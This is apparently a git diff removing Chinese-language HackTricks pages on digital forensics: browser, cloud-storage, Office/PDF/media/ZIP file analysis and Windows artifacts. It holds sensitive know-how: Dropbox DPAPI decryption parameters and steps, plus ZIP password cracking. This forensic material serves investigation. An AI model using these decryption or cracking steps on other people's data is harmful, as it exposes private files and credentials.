- **Current Session**/**Current Tabs**: 当前浏览会话和打开标签的数据。
- **Last Session**/**Last Tabs**: Chrome 关闭前最后会话中活动网站的信息。
- **Extensions**: 浏览器扩展和附加组件的目录。
- **Thumbnails**: 存储网站缩略图。
- **Preferences**: 一个信息丰富的文件,包括插件、扩展、弹出窗口、通知等的设置。
- **Browsers built-in anti-phishing**: 要检查反钓鱼和恶意软件保护是否启用,请运行 `grep 'safebrowsing' ~/Library/Application Support/Google/Chrome/Default/Preferences`。在输出中查找 `{"enabled: true,"}`
## **SQLite DB Data Recovery**
如前所述Chrome 和 Firefox 使用 **SQLite** 数据库存储数据。可以使用工具 [**sqlparse**](https://github.com/padfoot999/sqlparse) **或** [**sqlparse_gui**](https://github.com/mdegrazia/SQLite-Deleted-Records-Parser/releases) **恢复已删除的条目**
## **Internet Explorer 11**
Internet Explorer 11 在多个位置管理其数据和元数据,帮助分离存储的信息及其对应的详细信息,以便于访问和管理。
### Metadata Storage
Internet Explorer 的元数据存储在 `%userprofile%\Appdata\Local\Microsoft\Windows\WebCache\WebcacheVX.data`VX 为 V01、V16 或 V24。此外`V01.log` 文件可能显示与 `WebcacheVX.data` 的修改时间差异,表明需要使用 `esentutl /r V01 /d` 进行修复。此元数据存储在 ESE 数据库中,可以使用 photorec 和 [ESEDatabaseView](https://www.nirsoft.net/utils/ese_database_view.html) 等工具进行恢复和检查。在 **Containers** 表中,可以辨别每个数据段存储的特定表或容器,包括其他 Microsoft 工具(如 Skype的缓存详细信息。
### Cache Inspection
[IECacheView](https://www.nirsoft.net/utils/ie_cache_viewer.html) 工具允许检查缓存需要缓存数据提取文件夹位置。缓存的元数据包括文件名、目录、访问计数、URL 来源和指示缓存创建、访问、修改和过期时间的时间戳。
### Cookies Management
可以使用 [IECookiesView](https://www.nirsoft.net/utils/iecookies.html) 探索 cookies元数据包括名称、URL、访问计数和各种时间相关的详细信息。持久性 cookies 存储在 `%userprofile%\Appdata\Roaming\Microsoft\Windows\Cookies` 中,会话 cookies 存储在内存中。
### Download Details
下载元数据可以通过 [ESEDatabaseView](https://www.nirsoft.net/utils/ese_database_view.html) 访问,特定容器中保存 URL、文件类型和下载位置等数据。物理文件可以在 `%userprofile%\Appdata\Roaming\Microsoft\Windows\IEDownloadHistory` 下找到。
### Browsing History
要查看浏览历史,可以使用 [BrowsingHistoryView](https://www.nirsoft.net/utils/browsing_history_view.html),需要提取的历史文件位置和 Internet Explorer 的配置。这里的元数据包括修改和访问时间,以及访问计数。历史文件位于 `%userprofile%\Appdata\Local\Microsoft\Windows\History`
### Typed URLs
输入的 URL 及其使用时间存储在注册表中的 `NTUSER.DAT` 下的 `Software\Microsoft\InternetExplorer\TypedURLs``Software\Microsoft\InternetExplorer\TypedURLsTime`,跟踪用户输入的最后 50 个 URL 及其最后输入时间。
## Microsoft Edge
Microsoft Edge 将用户数据存储在 `%userprofile%\Appdata\Local\Packages` 中。各种数据类型的路径如下:
- **Profile Path**: `C:\Users\XX\AppData\Local\Packages\Microsoft.MicrosoftEdge_XXX\AC`
- **History, Cookies, and Downloads**: `C:\Users\XX\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.dat`
- **Settings, Bookmarks, and Reading List**: `C:\Users\XX\AppData\Local\Packages\Microsoft.MicrosoftEdge_XXX\AC\MicrosoftEdge\User\Default\DataStore\Data\nouser1\XXX\DBStore\spartan.edb`
- **Cache**: `C:\Users\XXX\AppData\Local\Packages\Microsoft.MicrosoftEdge_XXX\AC#!XXX\MicrosoftEdge\Cache`
- **Last Active Sessions**: `C:\Users\XX\AppData\Local\Packages\Microsoft.MicrosoftEdge_XXX\AC\MicrosoftEdge\User\Default\Recovery\Active`
## Safari
Safari 数据存储在 `/Users/$User/Library/Safari`。关键文件包括:
- **History.db**: 包含 `history_visits``history_items` 表,存储 URL 和访问时间戳。使用 `sqlite3` 查询。
- **Downloads.plist**: 有关下载文件的信息。
- **Bookmarks.plist**: 存储书签的 URL。
- **TopSites.plist**: 最常访问的网站。
- **Extensions.plist**: Safari 浏览器扩展的列表。使用 `plutil``pluginkit` 检索。
- **UserNotificationPermissions.plist**: 允许推送通知的域。使用 `plutil` 进行解析。
- **LastSession.plist**: 上一会话的标签。使用 `plutil` 进行解析。
- **Browsers built-in anti-phishing**: 使用 `defaults read com.apple.Safari WarnAboutFraudulentWebsites` 检查。响应为 1 表示该功能已启用。
## Opera
Opera 的数据位于 `/Users/$USER/Library/Application Support/com.operasoftware.Opera`,并与 Chrome 的历史和下载格式相同。
- **Browsers built-in anti-phishing**: 通过检查 Preferences 文件中的 `fraud_protection_enabled` 是否设置为 `true` 来验证,使用 `grep`
这些路径和命令对于访问和理解不同网络浏览器存储的浏览数据至关重要。
## References
- [https://nasbench.medium.com/web-browsers-forensics-7e99940c579a](https://nasbench.medium.com/web-browsers-forensics-7e99940c579a)
- [https://www.sentinelone.com/labs/macos-incident-response-part-3-system-manipulation/](https://www.sentinelone.com/labs/macos-incident-response-part-3-system-manipulation/)
- [https://books.google.com/books?id=jfMqCgAAQBAJ\&pg=PA128\&lpg=PA128\&dq=%22This+file](https://books.google.com/books?id=jfMqCgAAQBAJ&pg=PA128&lpg=PA128&dq=%22This+file)
- **Book: OS X Incident Response: Scripting and Analysis By Jaron Bradley pag 123**
{{#include ../../../banners/hacktricks-training.md}}

42
src/forensics/basic-forensic-methodology/specific-software-file-type-tricks/desofuscation-vbs-cscript.exe.md
View File

@ -1,42 +0,0 @@
{{#include ../../../banners/hacktricks-training.md}}
一些可以用于调试/去混淆恶意 VBS 文件的有用工具:
## echo
```bash
Wscript.Echo "Like this?"
```
## 评论
```bash
' this is a comment
```
## 测试
```bash
cscript.exe file.vbs
```
## 将数据写入文件
```js
Function writeBinary(strBinary, strPath)
Dim oFSO: Set oFSO = CreateObject("Scripting.FileSystemObject")
' below lines purpose: checks that write access is possible!
Dim oTxtStream
On Error Resume Next
Set oTxtStream = oFSO.createTextFile(strPath)
If Err.number <> 0 Then MsgBox(Err.message) : Exit Function
On Error GoTo 0
Set oTxtStream = Nothing
' end check of write access
With oFSO.createTextFile(strPath)
.Write(strBinary)
.Close
End With
End Function
```
{{#include ../../../banners/hacktricks-training.md}}

96
src/forensics/basic-forensic-methodology/specific-software-file-type-tricks/local-cloud-storage.md
View File

@ -1,96 +0,0 @@
# 本地云存储
{{#include ../../../banners/hacktricks-training.md}}
## OneDrive
在Windows中您可以在 `\Users\<username>\AppData\Local\Microsoft\OneDrive` 找到OneDrive文件夹。在 `logs\Personal` 中,可以找到文件 `SyncDiagnostics.log`,其中包含有关同步文件的一些有趣数据:
- 字节大小
- 创建日期
- 修改日期
- 云中的文件数量
- 文件夹中的文件数量
- **CID**: OneDrive用户的唯一ID
- 报告生成时间
- 操作系统的硬盘大小
一旦找到CID建议**搜索包含此ID的文件**。您可能会找到名为_**\<CID>.ini**_ 和 _**\<CID>.dat**_ 的文件这些文件可能包含与OneDrive同步的文件名称等有趣信息。
## Google Drive
在Windows中您可以在 `\Users\<username>\AppData\Local\Google\Drive\user_default` 找到主要的Google Drive文件夹\
此文件夹包含一个名为Sync_log.log的文件其中包含帐户的电子邮件地址、文件名、时间戳、文件的MD5哈希等信息。即使是已删除的文件也会出现在该日志文件中并带有相应的MD5。
文件 **`Cloud_graph\Cloud_graph.db`** 是一个sqlite数据库包含表 **`cloud_graph_entry`**。在此表中,您可以找到**同步** **文件**的**名称**、修改时间、大小和文件的MD5校验和。
数据库 **`Sync_config.db`** 的表数据包含帐户的电子邮件地址、共享文件夹的路径和Google Drive版本。
## Dropbox
Dropbox使用**SQLite数据库**来管理文件。在此\
您可以在以下文件夹中找到数据库:
- `\Users\<username>\AppData\Local\Dropbox`
- `\Users\<username>\AppData\Local\Dropbox\Instance1`
- `\Users\<username>\AppData\Roaming\Dropbox`
主要数据库包括:
- Sigstore.dbx
- Filecache.dbx
- Deleted.dbx
- Config.dbx
“.dbx”扩展名表示**数据库**是**加密的**。Dropbox使用**DPAPI** ([https://docs.microsoft.com/en-us/previous-versions/ms995355(v=msdn.10)?redirectedfrom=MSDN](<https://docs.microsoft.com/en-us/previous-versions/ms995355(v=msdn.10)?redirectedfrom=MSDN>))
要更好地理解Dropbox使用的加密您可以阅读 [https://blog.digital-forensics.it/2017/04/brush-up-on-dropbox-dbx-decryption.html](https://blog.digital-forensics.it/2017/04/brush-up-on-dropbox-dbx-decryption.html)。
然而,主要信息是:
- **熵**: d114a55212655f74bd772e37e64aee9b
- **盐**: 0D638C092E8B82FC452883F95F355B8E
- **算法**: PBKDF2
- **迭代次数**: 1066
除此之外,要解密数据库,您仍然需要:
- **加密的DPAPI密钥**: 您可以在注册表中找到它,路径为 `NTUSER.DAT\Software\Dropbox\ks\client`(将此数据导出为二进制)
- **`SYSTEM`** 和 **`SECURITY`** 注册单元
- **DPAPI主密钥**: 可以在 `\Users\<username>\AppData\Roaming\Microsoft\Protect` 找到
- Windows用户的**用户名**和**密码**
然后您可以使用工具 [**DataProtectionDecryptor**](https://nirsoft.net/utils/dpapi_data_decryptor.html)**:**
![](<../../../images/image (448).png>)
如果一切顺利,该工具将指示您需要**使用以恢复原始密钥的主密钥**。要恢复原始密钥,只需使用此 [cyber_chef配方](<https://gchq.github.io/CyberChef/index.html#recipe=Derive_PBKDF2_key(%7B'option':'Hex','string':'98FD6A76ECB87DE8DAB4623123402167'%7D,128,1066,'SHA1',%7B'option':'Hex','string':'0D638C092E8B82FC452883F95F355B8E'%7D)>),将主密钥作为配方中的“密码短语”。
生成的十六进制是用于加密数据库的最终密钥,可以用来解密:
```bash
sqlite -k <Obtained Key> config.dbx ".backup config.db" #This decompress the config.dbx and creates a clear text backup in config.db
```
**`config.dbx`** 数据库包含:
- **Email**: 用户的电子邮件
- **usernamedisplayname**: 用户的名称
- **dropbox_path**: Dropbox 文件夹所在的路径
- **Host_id: Hash** 用于认证到云端。此项只能从网页上撤销。
- **Root_ns**: 用户标识符
**`filecache.db`** 数据库包含与 Dropbox 同步的所有文件和文件夹的信息。表 `File_journal` 是包含更多有用信息的表:
- **Server_path**: 文件在服务器内部的路径(此路径前面有客户端的 `host_id`)。
- **local_sjid**: 文件的版本
- **local_mtime**: 修改日期
- **local_ctime**: 创建日期
此数据库中的其他表包含更多有趣的信息:
- **block_cache**: Dropbox 所有文件和文件夹的哈希
- **block_ref**: 将表 `block_cache` 的哈希 ID 与表 `file_journal` 中的文件 ID 关联
- **mount_table**: Dropbox 的共享文件夹
- **deleted_fields**: Dropbox 删除的文件
- **date_added**
{{#include ../../../banners/hacktricks-training.md}}

18
src/forensics/basic-forensic-methodology/specific-software-file-type-tricks/office-file-analysis.md
View File

@ -1,18 +0,0 @@
# Office file analysis
{{#include ../../../banners/hacktricks-training.md}}
有关更多信息,请查看 [https://trailofbits.github.io/ctf/forensics/](https://trailofbits.github.io/ctf/forensics/)。这只是一个摘要:
微软创建了许多办公文档格式,主要有两种类型:**OLE 格式**(如 RTF、DOC、XLS、PPT**Office Open XML (OOXML) 格式**(如 DOCX、XLSX、PPTX。这些格式可以包含宏使其成为网络钓鱼和恶意软件的目标。OOXML 文件结构为 zip 容器,可以通过解压缩进行检查,揭示文件和文件夹层次结构及 XML 文件内容。
要探索 OOXML 文件结构,提供了解压文档的命令和输出结构。隐藏数据的技术已被记录,表明在 CTF 挑战中数据隐蔽的持续创新。
对于分析,**oletools** 和 **OfficeDissector** 提供了全面的工具集,用于检查 OLE 和 OOXML 文档。这些工具有助于识别和分析嵌入的宏,这些宏通常作为恶意软件传递的载体,通常下载并执行额外的恶意负载。可以利用 Libre Office 对 VBA 宏进行分析,而无需 Microsoft Office这允许使用断点和监视变量进行调试。
**oletools** 的安装和使用非常简单,提供了通过 pip 安装和从文档中提取宏的命令。宏的自动执行由 `AutoOpen``AutoExec``Document_Open` 等函数触发。
```bash
sudo pip3 install -U oletools
olevba -c /path/to/document #Extract macros
```
{{#include ../../../banners/hacktricks-training.md}}

20
src/forensics/basic-forensic-methodology/specific-software-file-type-tricks/pdf-file-analysis.md
View File

@ -1,20 +0,0 @@
# PDF 文件分析
{{#include ../../../banners/hacktricks-training.md}}
**有关更多详细信息,请查看:** [**https://trailofbits.github.io/ctf/forensics/**](https://trailofbits.github.io/ctf/forensics/)
PDF 格式因其复杂性和潜在的数据隐藏能力而闻名,使其成为 CTF 取证挑战的焦点。它结合了纯文本元素和二进制对象,这些对象可能被压缩或加密,并且可以包含 JavaScript 或 Flash 等语言的脚本。要理解 PDF 结构,可以参考 Didier Stevens 的 [入门材料](https://blog.didierstevens.com/2008/04/09/quickpost-about-the-physical-and-logical-structure-of-pdf-files/),或使用文本编辑器或 PDF 专用编辑器如 Origami。
对于 PDF 的深入探索或操作,可以使用 [qpdf](https://github.com/qpdf/qpdf) 和 [Origami](https://github.com/mobmewireless/origami-pdf) 等工具。PDF 中的隐藏数据可能隐藏在:
- 隐形图层
- Adobe 的 XMP 元数据格式
- 增量生成
- 与背景颜色相同的文本
- 图像后面的文本或重叠的图像
- 不显示的注释
对于自定义 PDF 分析,可以使用 Python 库如 [PeepDF](https://github.com/jesparza/peepdf) 来制作定制的解析脚本。此外PDF 隐藏数据存储的潜力非常巨大,以至于像 NSA 关于 PDF 风险和对策的指南,尽管不再托管在其原始位置,但仍提供了有价值的见解。可以参考 [该指南的副本](http://www.itsecure.hu/library/file/Biztons%C3%A1gi%20%C3%BAtmutat%C3%B3k/Alkalmaz%C3%A1sok/Hidden%20Data%20and%20Metadata%20in%20Adobe%20PDF%20Files.pdf) 和 Ange Albertini 的 [PDF 格式技巧集合](https://github.com/corkami/docs/blob/master/PDF/PDF.md) 以获取更多相关阅读。
{{#include ../../../banners/hacktricks-training.md}}

9
src/forensics/basic-forensic-methodology/specific-software-file-type-tricks/png-tricks.md
View File

@ -1,9 +0,0 @@
{{#include ../../../banners/hacktricks-training.md}}
**PNG 文件**在 **CTF 挑战**中备受推崇,因为它们具有 **无损压缩**,使其非常适合嵌入隐藏数据。像 **Wireshark** 这样的工具可以通过解析网络数据包中的 PNG 文件来分析它们,揭示嵌入的信息或异常。
为了检查 PNG 文件的完整性和修复损坏,**pngcheck** 是一个关键工具,提供命令行功能来验证和诊断 PNG 文件 ([pngcheck](http://libpng.org/pub/png/apps/pngcheck.html))。当文件超出简单修复的范围时,像 [OfficeRecovery's PixRecovery](https://online.officerecovery.com/pixrecovery/) 这样的在线服务提供基于网络的解决方案来 **修复损坏的 PNG**,帮助 CTF 参与者恢复重要数据。
这些策略强调了在 CTF 中采用全面方法的重要性,利用分析工具和修复技术的结合来发现和恢复隐藏或丢失的数据。
{{#include ../../../banners/hacktricks-training.md}}

17
src/forensics/basic-forensic-methodology/specific-software-file-type-tricks/video-and-audio-file-analysis.md
View File

@ -1,17 +0,0 @@
{{#include ../../../banners/hacktricks-training.md}}
**音频和视频文件操作** 是 **CTF 取证挑战** 的一个重要组成部分,利用 **隐写术** 和元数据分析来隐藏或揭示秘密信息。工具如 **[mediainfo](https://mediaarea.net/en/MediaInfo)** 和 **`exiftool`** 对于检查文件元数据和识别内容类型至关重要。
对于音频挑战,**[Audacity](http://www.audacityteam.org/)** 是查看波形和分析频谱图的首选工具,对于揭示音频中编码的文本至关重要。**[Sonic Visualiser](http://www.sonicvisualiser.org/)** 被高度推荐用于详细的频谱图分析。**Audacity** 允许音频操作,如减慢或反转音轨以检测隐藏信息。**[Sox](http://sox.sourceforge.net/)** 是一个命令行工具,擅长转换和编辑音频文件。
**最低有效位 (LSB)** 操作是音频和视频隐写术中的一种常见技术,利用固定大小的媒体文件块来隐蔽地嵌入数据。**[Multimon-ng](http://tools.kali.org/wireless-attacks/multimon-ng)** 对于解码隐藏为 **DTMF 音调****摩尔斯电码** 的信息非常有用。
视频挑战通常涉及将音频和视频流打包的容器格式。**[FFmpeg](http://ffmpeg.org/)** 是分析和操作这些格式的首选工具,能够进行解复用和播放内容。对于开发者,**[ffmpy](http://ffmpy.readthedocs.io/en/latest/examples.html)** 将 FFmpeg 的功能集成到 Python 中,以实现高级可脚本交互。
这一系列工具突显了 CTF 挑战中所需的多样性,参与者必须运用广泛的分析和操作技术,以揭示音频和视频文件中的隐藏数据。
## 参考文献
- [https://trailofbits.github.io/ctf/forensics/](https://trailofbits.github.io/ctf/forensics/)
{{#include ../../../banners/hacktricks-training.md}}

21
src/forensics/basic-forensic-methodology/specific-software-file-type-tricks/zips-tricks.md
View File

@ -1,21 +0,0 @@
# ZIPs tricks
{{#include ../../../banners/hacktricks-training.md}}
**命令行工具** 用于管理 **zip 文件** 对于诊断、修复和破解 zip 文件至关重要。以下是一些关键工具:
- **`unzip`**: 揭示 zip 文件可能无法解压的原因。
- **`zipdetails -v`**: 提供 zip 文件格式字段的详细分析。
- **`zipinfo`**: 列出 zip 文件的内容而不提取它们。
- **`zip -F input.zip --out output.zip`** 和 **`zip -FF input.zip --out output.zip`**: 尝试修复损坏的 zip 文件。
- **[fcrackzip](https://github.com/hyc/fcrackzip)**: 一种用于暴力破解 zip 密码的工具,适用于大约 7 个字符的密码。
[Zip 文件格式规范](https://pkware.cachefly.net/webdocs/casestudies/APPNOTE.TXT) 提供了关于 zip 文件结构和标准的全面细节。
需要注意的是,受密码保护的 zip 文件 **不加密内部的文件名或文件大小**,这是一个与 RAR 或 7z 文件不同的安全缺陷,后者会加密这些信息。此外,使用较旧的 ZipCrypto 方法加密的 zip 文件在有未加密的压缩文件副本可用时容易受到 **明文攻击**。此攻击利用已知内容来破解 zip 的密码,这一漏洞在 [HackThis 的文章](https://www.hackthis.co.uk/articles/known-plaintext-attack-cracking-zip-files) 中有详细说明,并在 [这篇学术论文](https://www.cs.auckland.ac.nz/~mike/zipattacks.pdf) 中进一步解释。然而,使用 **AES-256** 加密的 zip 文件对这种明文攻击免疫,展示了为敏感数据选择安全加密方法的重要性。
## References
- [https://michael-myers.github.io/blog/categories/ctf/](https://michael-myers.github.io/blog/categories/ctf/)
{{#include ../../../banners/hacktricks-training.md}}

497
src/forensics/basic-forensic-methodology/windows-forensics/README.md
View File

@ -1,497 +0,0 @@
# Windows 证据
## Windows 证据
{{#include ../../../banners/hacktricks-training.md}}
## 通用 Windows 证据
### Windows 10 通知
在路径 `\Users\<username>\AppData\Local\Microsoft\Windows\Notifications` 中可以找到数据库 `appdb.dat`(在 Windows 周年更新之前)或 `wpndatabase.db`(在 Windows 周年更新之后)。
在这个 SQLite 数据库中,可以找到 `Notification` 表,里面包含所有的通知(以 XML 格式),可能包含有趣的数据。
### 时间线
时间线是 Windows 的一个特性,提供 **访问过的网页、编辑的文档和执行的应用程序的时间顺序历史**
数据库位于路径 `\Users\<username>\AppData\Local\ConnectedDevicesPlatform\<id>\ActivitiesCache.db`。这个数据库可以用 SQLite 工具打开,或者用工具 [**WxTCmd**](https://github.com/EricZimmerman/WxTCmd) **生成的 2 个文件,这些文件可以用工具** [**TimeLine Explorer**](https://ericzimmerman.github.io/#!index.md) **打开**
### ADS备用数据流
下载的文件可能包含 **ADS Zone.Identifier**,指示 **它是如何** 从内网、互联网等 **下载的**。一些软件(如浏览器)通常会提供更多 **信息**,例如 **文件下载的 URL**
## **文件备份**
### 回收站
在 Vista/Win7/Win8/Win10 中,**回收站**可以在驱动器根目录的文件夹 **`$Recycle.bin`** 中找到(`C:\$Recycle.bin`)。\
当一个文件在这个文件夹中被删除时,会创建 2 个特定的文件:
- `$I{id}`: 文件信息(删除日期)
- `$R{id}`: 文件内容
![](<../../../images/image (486).png>)
拥有这些文件后,可以使用工具 [**Rifiuti**](https://github.com/abelcheung/rifiuti2) 获取已删除文件的原始地址和删除日期(使用 `rifiuti-vista.exe` 适用于 Vista Win10
```
.\rifiuti-vista.exe C:\Users\student\Desktop\Recycle
```
![](<../../../images/image (495) (1) (1) (1).png>)
### 卷影复制
卷影复制是微软Windows中包含的一项技术可以创建计算机文件或卷的**备份副本**或快照,即使在使用时也可以。
这些备份通常位于文件系统根目录下的`\System Volume Information`中,名称由以下图像中显示的**UIDs**组成:
![](<../../../images/image (520).png>)
使用**ArsenalImageMounter**挂载取证镜像,可以使用工具[**ShadowCopyView**](https://www.nirsoft.net/utils/shadow_copy_view.html)检查卷影复制,甚至**提取文件**。
![](<../../../images/image (521).png>)
注册表项`HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\BackupRestore`包含**不备份**的文件和键:
![](<../../../images/image (522).png>)
注册表`HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\VSS`也包含有关`卷影复制`的配置信息。
### Office自动保存文件
您可以在以下位置找到Office自动保存的文件`C:\Usuarios\\AppData\Roaming\Microsoft{Excel|Word|Powerpoint}\`
## Shell项目
Shell项目是包含有关如何访问另一个文件的信息的项目。
### 最近文档 (LNK)
Windows会在用户**打开、使用或创建文件**时**自动****创建**这些**快捷方式**
- Win7-Win10: `C:\Users\\AppData\Roaming\Microsoft\Windows\Recent\`
- Office: `C:\Users\\AppData\Roaming\Microsoft\Office\Recent\`
当创建一个文件夹时,还会创建指向该文件夹、父文件夹和祖父文件夹的链接。
这些自动创建的链接文件**包含有关来源的信息**,例如它是一个**文件**还是一个**文件夹**、该文件的**MAC** **时间**、文件存储的**卷信息**以及**目标文件的文件夹**。这些信息在文件被删除的情况下可以用于恢复这些文件。
此外,链接文件的**创建日期**是原始文件**首次使用**的**时间**,而链接文件的**修改日期**是原始文件**最后使用**的**时间**。
要检查这些文件,您可以使用[**LinkParser**](http://4discovery.com/our-tools/)。
在此工具中,您将找到**2组**时间戳:
- **第一组:**
1. FileModifiedDate
2. FileAccessDate
3. FileCreationDate
- **第二组:**
1. LinkModifiedDate
2. LinkAccessDate
3. LinkCreationDate。
第一组时间戳引用的是**文件本身的时间戳**。第二组引用的是**链接文件的时间戳**。
您可以通过运行Windows CLI工具[**LECmd.exe**](https://github.com/EricZimmerman/LECmd)获取相同的信息。
```
LECmd.exe -d C:\Users\student\Desktop\LNKs --csv C:\Users\student\Desktop\LNKs
```
在这种情况下,信息将保存在 CSV 文件中。
### Jumplists
这些是每个应用程序指示的最近文件。它是 **应用程序使用的最近文件列表**,您可以在每个应用程序上访问。它们可以 **自动创建或自定义**
自动创建的 **jumplists** 存储在 `C:\Users\{username}\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\`。jumplists 的命名格式为 `{id}.autmaticDestinations-ms`,其中初始 ID 是应用程序的 ID。
自定义的 jumplists 存储在 `C:\Users\{username}\AppData\Roaming\Microsoft\Windows\Recent\CustomDestination\`,通常是因为文件发生了某些 **重要** 事件(可能被标记为收藏)。
任何 jumplist 的 **创建时间** 表示 **文件首次访问的时间****修改时间为最后一次**。
您可以使用 [**JumplistExplorer**](https://ericzimmerman.github.io/#!index.md) 检查 jumplists。
![](<../../../images/image (474).png>)
_请注意JumplistExplorer 提供的时间戳与 jumplist 文件本身相关_
### Shellbags
[**点击此链接了解什么是 shellbags。**](interesting-windows-registry-keys.md#shellbags)
## 使用 Windows USB
可以通过以下方式识别 USB 设备的使用:
- Windows Recent Folder
- Microsoft Office Recent Folder
- Jumplists
请注意,一些 LNK 文件不是指向原始路径,而是指向 WPDNSE 文件夹:
![](<../../../images/image (476).png>)
WPDNSE 文件夹中的文件是原始文件的副本,因此在 PC 重启后不会保留GUID 是从 shellbag 中获取的。
### 注册表信息
[查看此页面以了解](interesting-windows-registry-keys.md#usb-information) 哪些注册表键包含有关 USB 连接设备的有趣信息。
### setupapi
检查文件 `C:\Windows\inf\setupapi.dev.log` 以获取 USB 连接发生时的时间戳(搜索 `Section start`)。
![](<../../../images/image (477) (2) (2) (2) (2) (2) (2) (2) (3) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (14).png>)
### USB Detective
[**USBDetective**](https://usbdetective.com) 可用于获取有关已连接到图像的 USB 设备的信息。
![](<../../../images/image (483).png>)
### Plug and Play Cleanup
名为“Plug and Play Cleanup”的计划任务主要用于删除过时的驱动程序版本。与其指定的保留最新驱动程序包版本的目的相反在线来源表明它还针对过去 30 天未活动的驱动程序。因此,过去 30 天未连接的可移动设备的驱动程序可能会被删除。
该任务位于以下路径:
`C:\Windows\System32\Tasks\Microsoft\Windows\Plug and Play\Plug and Play Cleanup`
提供了任务内容的屏幕截图:
![](https://2.bp.blogspot.com/-wqYubtuR_W8/W19bV5S9XyI/AAAAAAAANhU/OHsBDEvjqmg9ayzdNwJ4y2DKZnhCdwSMgCLcBGAs/s1600/xml.png)
**任务的关键组件和设置:**
- **pnpclean.dll**:此 DLL 负责实际的清理过程。
- **UseUnifiedSchedulingEngine**:设置为 `TRUE`,表示使用通用任务调度引擎。
- **MaintenanceSettings**
- **Period ('P1M')**:指示任务调度程序在常规自动维护期间每月启动清理任务。
- **Deadline ('P2M')**:指示任务调度程序,如果任务连续两个月失败,则在紧急自动维护期间执行该任务。
此配置确保定期维护和清理驱动程序,并在连续失败的情况下重新尝试任务。
**有关更多信息,请查看:** [**https://blog.1234n6.com/2018/07/windows-plug-and-play-cleanup.html**](https://blog.1234n6.com/2018/07/windows-plug-and-play-cleanup.html)
## 电子邮件
电子邮件包含 **2 个有趣的部分:电子邮件的标题和内容**。在 **标题** 中,您可以找到以下信息:
- **谁** 发送了电子邮件电子邮件地址、IP、重定向电子邮件的邮件服务器
- **何时** 发送了电子邮件
此外,在 `References``In-Reply-To` 标头中,您可以找到消息的 ID
![](<../../../images/image (484).png>)
### Windows Mail 应用
此应用程序以 HTML 或文本格式保存电子邮件。您可以在 `\Users\<username>\AppData\Local\Comms\Unistore\data\3\` 的子文件夹中找到电子邮件。电子邮件以 `.dat` 扩展名保存。
电子邮件的 **元数据****联系人** 可以在 **EDB 数据库** 中找到: `\Users\<username>\AppData\Local\Comms\UnistoreDB\store.vol`
**将文件的扩展名** 从 `.vol` 更改为 `.edb`,您可以使用工具 [ESEDatabaseView](https://www.nirsoft.net/utils/ese_database_view.html) 打开它。在 `Message` 表中,您可以看到电子邮件。
### Microsoft Outlook
当使用 Exchange 服务器或 Outlook 客户端时,将会有一些 MAPI 标头:
- `Mapi-Client-Submit-Time`:发送电子邮件时系统的时间
- `Mapi-Conversation-Index`:线程的子消息数量和每条消息的时间戳
- `Mapi-Entry-ID`:消息标识符。
- `Mappi-Message-Flags``Pr_last_Verb-Executed`:有关 MAPI 客户端的信息(消息已读?未读?已回复?重定向?不在办公室?)
在 Microsoft Outlook 客户端中,所有发送/接收的消息、联系人数据和日历数据都存储在 PST 文件中,路径为:
- `%USERPROFILE%\Local Settings\Application Data\Microsoft\Outlook`WinXP
- `%USERPROFILE%\AppData\Local\Microsoft\Outlook`
注册表路径 `HKEY_CURRENT_USER\Software\Microsoft\WindowsNT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook` 指示正在使用的文件。
您可以使用工具 [**Kernel PST Viewer**](https://www.nucleustechnologies.com/es/visor-de-pst.html) 打开 PST 文件。
![](<../../../images/image (485).png>)
### Microsoft Outlook OST 文件
**OST 文件** 是 Microsoft Outlook 在配置为 **IMAP****Exchange** 服务器时生成的,存储与 PST 文件类似的信息。此文件与服务器同步,保留 **过去 12 个月** 的数据,最大大小为 50GB并位于与 PST 文件相同的目录中。要查看 OST 文件,可以使用 [**Kernel OST viewer**](https://www.nucleustechnologies.com/ost-viewer.html)。
### 检索附件
丢失的附件可能可以从以下位置恢复:
- 对于 **IE10**`%APPDATA%\Local\Microsoft\Windows\Temporary Internet Files\Content.Outlook`
- 对于 **IE11 及更高版本**`%APPDATA%\Local\Microsoft\InetCache\Content.Outlook`
### Thunderbird MBOX 文件
**Thunderbird** 使用 **MBOX 文件** 存储数据,位于 `\Users\%USERNAME%\AppData\Roaming\Thunderbird\Profiles`
### 图像缩略图
- **Windows XP 和 8-8.1**:访问带有缩略图的文件夹会生成一个 `thumbs.db` 文件,存储图像预览,即使在删除后也会保留。
- **Windows 7/10**:通过 UNC 路径访问时会创建 `thumbs.db`
- **Windows Vista 及更高版本**:缩略图预览集中在 `%userprofile%\AppData\Local\Microsoft\Windows\Explorer` 中,文件名为 **thumbcache_xxx.db**。 [**Thumbsviewer**](https://thumbsviewer.github.io) 和 [**ThumbCache Viewer**](https://thumbcacheviewer.github.io) 是查看这些文件的工具。
### Windows 注册表信息
Windows 注册表存储大量系统和用户活动数据,包含在以下文件中:
- `%windir%\System32\Config` 用于各种 `HKEY_LOCAL_MACHINE` 子键。
- `%UserProfile%{User}\NTUSER.DAT` 用于 `HKEY_CURRENT_USER`
- Windows Vista 及更高版本在 `%Windir%\System32\Config\RegBack\` 中备份 `HKEY_LOCAL_MACHINE` 注册表文件。
- 此外,程序执行信息存储在 `%UserProfile%\{User}\AppData\Local\Microsoft\Windows\USERCLASS.DAT` 中,从 Windows Vista 和 Windows 2008 Server 开始。
### 工具
一些工具对于分析注册表文件非常有用:
- **注册表编辑器**:它安装在 Windows 中。它是一个 GUI用于浏览当前会话的 Windows 注册表。
- [**Registry Explorer**](https://ericzimmerman.github.io/#!index.md):它允许您加载注册表文件并通过 GUI 浏览它们。它还包含书签,突出显示包含有趣信息的键。
- [**RegRipper**](https://github.com/keydet89/RegRipper3.0):同样,它具有一个 GUI允许浏览加载的注册表并且还包含突出显示加载的注册表中有趣信息的插件。
- [**Windows 注册表恢复**](https://www.mitec.cz/wrr.html):另一个 GUI 应用程序,能够从加载的注册表中提取重要信息。
### 恢复已删除元素
当一个键被删除时,它会被标记为已删除,但在占用的空间被需要之前不会被移除。因此,使用像 **Registry Explorer** 这样的工具可以恢复这些已删除的键。
### 最后写入时间
